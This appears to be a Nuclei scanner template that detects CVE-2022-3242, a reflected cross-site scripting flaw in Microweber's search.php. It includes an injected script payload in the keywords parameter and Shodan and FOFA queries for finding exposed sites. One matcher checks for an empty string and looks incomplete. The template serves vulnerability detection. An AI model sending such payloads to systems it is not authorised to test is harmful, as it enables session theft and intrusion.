id: CVE-2022-3242

info:
  name: Microweber <1.3.2 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Code Injection in search.php?keywords= in GitHub repository microweber/microweber prior to 1.3.2.
  impact: |
    Attackers can craft malicious search URLs with JavaScript in the keywords parameter that executes when users access search results, potentially stealing session cookies, admin credentials, or performing unauthorized content modifications in Microweber CMS.
  remediation: |
    Update Microweber to version 1.3.2 or later, which properly sanitizes and encodes the keywords parameter in search.php.
  reference:
    - https://huntr.dev/bounties/3e6b218a-a5a6-40d9-9f7e-5ab0c6214faf/
    - https://www.tenable.com/cve/CVE-2022-3242
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3242
    - https://github.com/microweber/microweber/commit/68f0721571653db865a5fa01c7986642c82e919c
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-3242
    cwe-id: CWE-79,CWE-94
    epss-score: 0.19791
    epss-percentile: 0.95562
    cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: microweber
    product: microweber
    shodan-query:
      - http.favicon.hash:780351152
      - http.html:"microweber"
    fofa-query:
      - body="microweber"
      - icon_hash=780351152
  tags: cve,cve2022,huntr,xss,microweber,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/search.php?keywords=ABC%3Cdiv%20style=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "") && contains(tolower(body), "microweber")'
        condition: and
# digest: 4b0a0048304602210092ae8d0d2656f6056af473c9b217bf50248ed0f44316fceebef40177f0cca0db022100df4097b7a09363de5a5cb453ab30840d5d673289bc48e1ed42dcfed0f9eb5999:922c64590222798bb761d5b6d8e72950